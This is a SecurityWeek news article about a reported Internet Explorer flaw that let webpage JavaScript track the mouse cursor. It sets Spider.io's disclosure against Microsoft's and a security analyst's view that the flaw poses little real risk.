Security Experts:

Microsoft: IE Mouse Tracking Exploit Poses "Little Risk"

Microsoft fired back at a report of an attack that allows people to track the position of a user's mouse cursor.

The situation was publicized by web analytics company Spider.io, which revealed that – using a few lines of JavaScript – hackers can monitor the position of a target's cursor when they are using Internet Explorer. Microsoft and others however have argued that the the firm is exaggerating the threat the situation poses.

According to Spider.io, the issue – which affects Internet Explorer (IE) versions 6-10 - is that IE's event model populates the global Event object with attributes relating to mouse events.

"Combined with the ability to trigger events manually using the fireEvent() method, this allows JavaScript in any webpage (or in any iframe within any webpage) to poll for the position of the mouse cursor anywhere on the screen and at any time—even when the tab containing the page is not active, or when the Internet Explorer window is unfocused or minimized," the company explained in an advisory. "The fireEvent() method also exposes the status of the control, shift and alt keys."

"Affected properties of the Event object are altKey, altLeft, clientX, clientY, ctrlKey, ctrlLeft, offsetX, offsetY, screenX, screenY, shiftKey, shiftLeft, x and y," according to the advisory.

The situation is being exploited by at least two display ad analytics companies across billions of page impressions per month, the company noted, adding that the vulnerability is "particularly troubling" because it compromises the security of virtual keyboards and keypads.

Though Microsoft is working to adjust this behavior in IE, the underlying issue has more to do with competition between analytics companies than consumer safety or privacy, argued Microsoft's Dean Hachamovitch, corporate vice president, Internet Explorer, in a blog post.

"The only reported active use of this behavior involves competitors to Spider.io providing analytics," he blogged, noting that different analytics companies use different means to gather consumer information across browsers and devices.

"Online advertisers started a shift “from a ‘served’ to a ‘viewable’ impression[s]," he blogged. "Many different analytics companies stepped up to compete in this space. That competition has had many public results, including lawsuits. One of the companies involved in this space is Spider.io, which recently reported an issue in IE involving mouse pointer information. Spider.io is an advertising analytics company. Their recent blog post, “There are two ways to measure ad viewability. There is only one right way,” makes their point of view very clear. Different analytics companies use different and equivalent methods to gather consumer information across different browsers on different devices."

For the exploit Spider.io describes to be successful, "the browser stars all seem to need to be in alignment to be able to target an individual," Paul Henry, security and forensic analyst at Lumension, said in a statement.

"A hacker would need to know the users' exact screen resolution, the location of the virtual keyboard and the key layout being used," he said. "Yes, in a lab environment, it can be made to look spectacular, but in the real world, I question just how much of a threat to users this really is."

If a user changes any settings on their browser, this is no longer an issue, Henry added.

"For example, my bank uses a randomized keyboard on my banking application, so it wouldn’t be an issue there," he said.

The theoretical use of this behavior to compromise consumer safety is something Microsoft’s security team has discussed with researchers across the industry, noted Hachamovitch.

"We take these risks very seriously," he wrote. "Getting all the pieces to line up in order to take advantage of this behavior – serving an ad to a site that asks for a logon, the user using an on screen (or virtual) keyboard, knowing how that onscreen keyboard works – is hard to imagine. From investigating the specific behavior when mouse position data is visible outside the browser window, sites can view only the mouse state; they cannot view the actual content that the user is interacting with. From our conversations with security researchers across the industry, we see very little risk to consumers at this time."

Subscribe to the SecurityWeek Email Briefing
view counter